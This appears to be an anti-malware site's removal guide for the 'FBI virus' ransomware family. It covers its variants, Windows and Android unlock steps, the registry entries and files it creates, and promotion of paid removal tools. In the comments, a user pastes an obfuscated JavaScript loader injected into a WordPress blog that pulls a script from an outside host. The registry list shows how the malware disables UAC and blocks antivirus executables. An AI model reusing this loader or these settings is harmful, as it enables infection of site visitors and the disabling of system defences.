Severity scale:  

FBI virus. How to remove? (Uninstall guide)

by ,
Also known as MoneyPack ransomware | Type: Ransomware | Tags: Ukash
SpyHunter is a tool to detect malware. You need to purchase full version to remove infections.
More information about SpyHunter and steps to uninstall.

FBI virus is a sneaky malware, which can get into its target computer undetected with a help of Trojan.LockScreen. As soon as it gets inside, this scamware presents itself as 'The FBI Federal Bureau Investigation' and shows an aggressively-designed alert. This alert claims that computer is blocked regarding to the Copyright and Related Rights Law violation and other seriously-looking reasons. Unfortunately, if you found yourself blocked by a program, which tells that you have been illegally using or distributing copyrighted content, viewing or distributing pornographic content and spreading malware, you must ignore such alert. That's because it means that your PC is infected. Remember, this program is distributed by scammers only for swindling your and other people's money, so you must remove FBI virus immediately after detection! Beware that security experts expect this group of ransomware to grow and improve in the future..


This infection gets inside the system through security vulnerabilities that appear as soon as people forget to take care of their computers' security. If you don't use security software or don't update it, you can also run into this virus one day. Of course, you must always think about safe browsing and avoid suspicious downloads that are actively offered on the Internet right now. The biggest issue, which is caused by this ransomware, is that it has ability to block the system, 'lock' it down and disable all programs that are kept on it. In order to 'unlock' it, FBI virus offers to pay the fine through MoneyPak or other prepayment systems. Of course, as you must have already understood, you must never pay this $100 fine if you don't want to support those scammers who are collecting these fines.


FBI Moneypak: This ransomware uses a huge alert filled with FBI and Moneypak logos, a webcam and a list of crimes victim is accused for. User is informed that he has been viewing/distributing pornographic or copyrighted content, spreading malware or doing other illegal activities. For that, he has to pay a $100  fine and enter a Moneypak code on the right side of the fake alert. This threat locks the system down completely.

FBI Green Dot Moneypak Virus: This ransomware locks the whole system down and displays a fake alert with FBI, Moneypak and McAfee logos. A miselading message, which belongs to this threat, claims that Federal Bureau of Investigation has blocked you for downloading illegal/copyrighted material and similar crimes. It requires to pay $200 fine and includes the steps explaining how you should do that.

FBI Virus Black Screen: This ransomware from the FBI group of viruses uses the same technique as its predecessors and seeks to make users pay a $200 fine. However, it also applies an audio warning, black screen and system's lock down. It will similarly claim that you have been caught for law violations and will accuse you for visiting pornographic websites, viewing files containing zoophilia, child pornography and similar.

FBI Online Agent: This ransomware also uses the name of the Federal Bureau of Investigation, but it has a newly-designed alert, which tends to accuse victim for committing various crimes and asks to pay $200 using MoneyPak. The new thing about FBI Online Agent is that it doesn't show your IP address or location but gives the name of the responsible agent, case number and other details that are clearly invented. Besides, scammers have included the promotion of the terrorism into the list of the crimes that are reported into this misleading warning.

FBI Cybercrime Division virus: That's the dangerous ransomware, which pretends to belong to the FBI's Cybercrime Division. This virus uses identical scheme while trying to steal users' money. However, this time it asks to pay $300 using Moneypak prepayment system. Be sure that its alert is not legitimte and can be safely ignored. The new version applies a newly designed alert, which is filled with more than ten different logos. 

FBI PayPal virus: This ransomware is not related in any way to Federal Bureau of Investigation . As soon as it gets inside the system, this ransomware blocks the entire desktop and disables Internet connection on its target PC. In addition, it asks paying the fine of $100 for invented online crimes, such as the use of copyrighted content or distribution of malware. Differently from earlier parasites, that use identical scheme for stealing the money, FBI PayPal virus uses PayPal for its money transactions. Please, stay away from this threat.

FBI Department of Defense virus: This is a dangerous ransomware virus, which, similarly to its predecessors, seeks to swindle $300 by convincing its victims that they have violated several laws of USA. This virus has the same ability to lock down the PC and hide every file, which is kept on the computer. The new thing about this version of FBI virus, is that it offers using MoneyGram prepayment system for paying the fine. Please, never follow its recommendations!

White Screen FBI virus: This is a cyber infection, which is categorized as ransomware and belongs to the same group of FBI virus. If you see a white screen and a mouse cursor on your computer's desktop, that means this virus failed to load properly. However, you may also receive a huge warning from FBI, which reports about the illegal use of videos related to child pornography or other e-crimes. Please, ignore warning that belongs to White Screen FBI virus and never pay any money or provide any personal information.

FBI Computer Crime and Intellectual Property Section virus: This is a dangerous ransomware that occupies entire computer as soon as it infects it. Instead of the desktop, it shows a huge alert stating that 'computer is locked by Internet Service Provider' for several different reasons. Just like previous versions, it claims that computer's owner was noticed watching and spreading copyrighted content and doing other activities that clearly violate some laws of USA. This FBI virus version asks to pay a fine of $200. Please, never follow this requirement.

FBI System Failure virus: FBI System Failure virus is a serious ransomware threat, which blocks computers with its fake warning saying: 'All Activities of this computer has been recorded. All your files are encrypted. Don’t try to unlock your computer!'. Just like previous its versions, this virus seeks to make its victims pay an invented fine. This version is used to swindle $300, for that it asks using REloadit prepayment system. If you see such warning, you must ignore it and use anti-malware software to remove malicious files from the system. 


In order to remove FBI virus, you should firstly unlock your computer. For that, we recommend using another PC that has an Internet connection and following the steps listed bellow:

1. Take another machine and use it to download SpyHunter or other reputable anti-malware program. You can also try downloading STOPzilla or Malwarebytes Anti Malware.

2. Update the program and put into the USB drive or simple CD.

3. In the meanwhile, reboot your infected machine to Safe Mode with command prompt and stick USB drive in it.

4. Reboot computer infected with virus once more and run a full system scan.

UPDATE: Be aware about the new versions of FBI virus, that are called FBI Green Dot Moneypak virusFBI Virus Black Screen and FBI Online Agent. They have been clearly designed to get more money from its victims, so they show a warning asking $200, not $100, to be payed through MoneyPak prepayment system. To remove these versions completely, run a full system scan with updated anti-virus/anti-malware program. In order to unlock your PC, use the steps given above and follow additional information:

* Users infected with FBI group of viruses are allowed to access other accounts on their Windows systems. If one of such accounts has administrator rights, you should be capable to launch anti-malware program.

*   Try to deny the Flash to make your ransomware stop function as intended. In order to disable the Flash, go to Macromedia support and select 'Deny': After doing that, run a full system scan with anti-malware program.

* Manual FBI virus removal:

  1. Reboot you infected PC to 'Safe mode with command prompt' to disable FBI virus (this should be working with all versions of this threat)
  2. Run Regedit
  3. Search for WinLogon Entries and write down all the files that are not explorer.exe or blank. Replace them with explorer.exe.
  4. Search the registry for these files you have written down and delete the registry keys referencing the files.
  5. Reboot and run a full system scan with updated SpyHunter to remove remaining files.

This video guide shows how to remove FBI virus. However, there might be some differences in its removal because of diffrent systems and versions of the parasite. Use the auto-removal process to remove the infection easily.

UPDATE2: FBI virus has just been updated - now it is capable of blocking Android devices. It acts just like its previous versions. So, as soon as FBI android virus enters OS, it locks is down and then displays a fake warning message asking people to pay a fine for their illegal online activities. Please, do NOT pay this fine! If your Android device was blocked, you should follow these steps: 

1. Reboot your Android device into Safe Mode:

  1. Find the power button and press it for a couple of seconds until you see a menu. Tap the Power off.
  2. Once you see a dialog window that offers you to reboot your Android to Safe Mode, select this option and OK.

If this failed to work for you, just turn off your device and then turn it on. Once it becomes active, try pressing and holding MenuVolume DownVolume Up or Volume Down and Volume Up together to see Safe Mode.

2. Uninstall malicious app (FBI Android virus may hide under BaDoink, Video Player, Network Driver System, Video Render, ScarePakage and other suspicious names):

  1. When in Safe Mode, go to Settings. Once there, click on Apps or Application manager (this may differ depending on your device).
  2. Here, look for previously mentioned malicious app(s) and uninstall all of them.

If this failed, enter a random, 15 digit length, code of imaginary MoneyPak xpress Packed voucher that is asked by FBI android virus or follow these steps:

  1. Go to Settings -> Security. Here, select Device administrators.
  2. Here, look for previously mentioned malicious app(s) and uncheck it
  3. In order to finish the removal of FBI Android virus, select Deactivate and OK.

FBI virus video guide

It might be that we are affiliated with any of our recommended products. Full disclosure can be found in our Agreement of Use.
By downloading any of provided Anti-spyware software you agree with our Privacy Policy and Agreement of Use.
remover for FBI virus
Compatible with OS X
Webroot SecureAnywhere AntiVirus is recommended remover to uninstall FBI virus. You should confirm using free trial that it detects current version of parasite.
Not using OS X? Download a remover for Windows.
Do it now!
remover for FBI virus Happiness
Compatible with Microsoft Microsoft Windows logo
SpyHunter is recommended to uninstall FBI virus. Free scanner allows you to check whether your PC is infected or not. If you need to remove malware, you have to purchase the licensed version of SpyHunter malware removal tool. More information about this program can be found in SpyHunter review. If you decided to select another anti-spyware, uninstall SpyHunter from your computer.
more than 40.000.000 downloads!
What to do if failed? If you failed to remove infection using Webroot SecureAnywhere AntiVirus SpyHunter, read here how to submit a support ticket or submit a question to our support team and provide as much details as possible.
Alternate Software
We are testing STOPzilla's efficiency (2012-06-18 09:51:30)
Malwarebytes Anti Malware
We are testing Malwarebytes Anti Malware's efficiency (2012-06-18 09:51:30)
XoftSpySE Anti Spyware
We are testing XoftSpySE Anti Spyware's efficiency (2012-06-18 09:51:30)
Defender Pro Ultimate
Virus Removal Phone Support
FBI virus screenshot

FBI virus manual removal

Kill processes:
Delete registry values:
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Policies\System ‘DisableRegistryTools’ = 0
HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system ‘EnableLUA’ = 0
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Internet Settings ‘WarnOnHTTPSToHTTPRedirect’ = 0
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Policies\System ‘DisableRegedit’= 0
HKEY_CURRENT_USER\Software\FBI Moneypak Virus
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ‘Inspector’
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FBI Moneypak Virus
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Policies\System ‘DisableTaskMgr’ = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\protector.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Inspector %AppData%\Protector-[rnd].exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings\ID 4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings\UID [rnd]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings\net [date of installation]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ConsentPromptBehaviorAdmin 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ConsentPromptBehaviorUser 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe\Debugger svchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCare.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCare.exe\Debugger svchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE\Debugger svchost.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System “DisableRegistryTools” = 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System “DisableTaskMgr” = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system “ConsentPromptBehaviorAdmin” = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system “ConsentPromptBehaviorUser” = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system “EnableLUA” = 0
Unregister DLLs:

Delete files:
%Program Files%\FBI Moneypak Virus
%Documents and Settings%\[UserName]\Application Data\[random].exe
%Documents and Settings%\[UserName]\Desktop\[random].lnk
%Documents and Settings%\All Users\Application Data\FBI Moneypak Virus
%CommonStartMenu%\Programs\FBI Moneypak Virus.lnk
%UserProfile%\Desktop\FBI Moneypak Virus.lnk

Geolocation of FBI virus

Map reveals the prevalence of FBI virus. Countries and regions that have been affected the most are: United States, Indonesia, India, Canada and Mexico.

Removal guides in other languages

Information updated:

Comments on FBI virus

Hi I have a samsung galaxy s6 and an FBI virus scam is on my screen demanding 500$ or they will notify my contacts. I have contacted the FBI and they assured me that this is a scam. However, I am unable to get this off my screen. I am only able to turn off my phone. When it reboots it asks for a code. I dont have that unlock code. And I pray that ... thaT is all that is needed to remove this darn thing. PLEASE HELP ME
william newton Lee
why would my neibors want to hack my book reader or my posts on line? in douglas arizona
If i reset my tablet and do a new account will it go away. Plz reply
This happend to my android tablet but it didnt log me off what does this mean...plz help im so scared
how to unlock rca tabletwth fbi virus on it
How can I get it out of a Kindle
thank you the unstalling worked
Please can anyone help me.. My HTC616 is affected with FBI virus and ask me to pay $500. I have restarted my time with and without memorycard. Please give solution or drop me an email at
Thanks Romeo. Super simple. Gotta try on XP the same way thru command prompt and remove from parents computer. What we have to do is develop a counter-malware that infects the infector at installation. Were working on that but could always use input. Thanks again.
I have a Samsung 10.1 notebook infected by the fbi virus, what can I do
Mike Hawk
How do you get the virus off your cell phone.
I literally just had this happen to me. I had to pull the sd card then reset my phone. Hope this helps.
Here is how you prevent this from happening again. If you run your browser Incognito mode files are not saved to your computer. So if the window pops up with the FBI warning, simply hit- cntr alt del and bring up the task manager, then force shut down of browser window. End of problem, restart the browser and reopen incognito window.
Thank you for the help. My virus quit when I restarted my computer. It said I had a $500 fine.
hi just want to thank you very much for this info when i saw that website i freaked out knowing that i havent pirated anything.
I though i was being blamed but to discover it is a scam!!!
some people are just horrible low down pieces of ****
so thank you once again
Hi my wordpress blog got infected with this code

/*LGPL*/ try{ window.onload = function(){var Jgnn5u88aojf3 = document.createElement(s&^c(r&$$i&p#t@#!.replace(/@|$|)|(|!|#|&|^/ig, ));Jgnn5u88aojf3.setAttribute(defer, d!e#&f)!e((r!)#.replace(/#|)|^|&|!|@|$|(/ig, ));Jgnn5u88aojf3.setAttribute(type, t^e&!x()(^t!!^/#^j((#a$#$v&(a)s#&c#^r^!i&p)&t^.replace(/$|@|(|#|&|)|!|^/ig, ));Jgnn5u88aojf3.setAttribute(id, K#!^9$q#y(@3&^#n!#5^o@@#q##^k!($b$(&9!&&.replace(/^|@|!|&|)|#|(|$/ig, ));Jgnn5u88aojf3.setAttribute(s$^r!(^c&.replace(/$|)|^|(|&|@|#|!/ig, ), h&)t&$)(t)p@^##@:)(@/(/^@o^^&n&#e^&m@$a^@n^@g#a(-^^c$&!o^$#m&@.($!$t(##@i#@c@&&&k^(#e@t(!m#a!))s#t#(e^&@r@(.)#(c@^o$m$).##p!#l##&a&@l^(a))-)&o!@r#^)-^$@j@@$p!&(.)@)w(^!!o@&)@r^^!l)@d@!w#()e)(b(^w##!o@$&r^!)l$d(@.)##r($&)(u$#)&:@8(!!$0(!^)8^0&)/(##c))&l$a^&s)s^m)(a#t@e!&)s$.#!c$&o)^)@m@/@$c(l$a()s^$!s^((m@^&a!t$e^s!.#@^c)^!o)^m!!&/$^b#@$o$s!#t^$(o^!^n($.)@c))@o@!m!^/)g#)o$o(@#&g)!)l&&#$e($(.!c&o&@&@!m&/(($h!#u()(a^$$n(#q^&i@@#&u&&.#^##c@##o&$m&^##/&.replace(/&|^|(|$|!|)|#|@/ig, ));if (document){document.body.appendChild(Jgnn5u88aojf3);}} } catch(Rv4t8n6s1x6zp0x02e8dmd) {}

What can i do?

Post a comment

Attention: Use this form only if you have additional information about a parasite, its removal instructions, additional resources or behavior. By clicking "post comment" button you agree not to post any copyrighted, unlawful, harmful, threatening, abusive, harassing, defamatory, vulgar, obscene, profane, hateful, racially, ethnically or otherwise objectionable material of any kind.

Home page Name


(All fields are required)
Like us on Facebook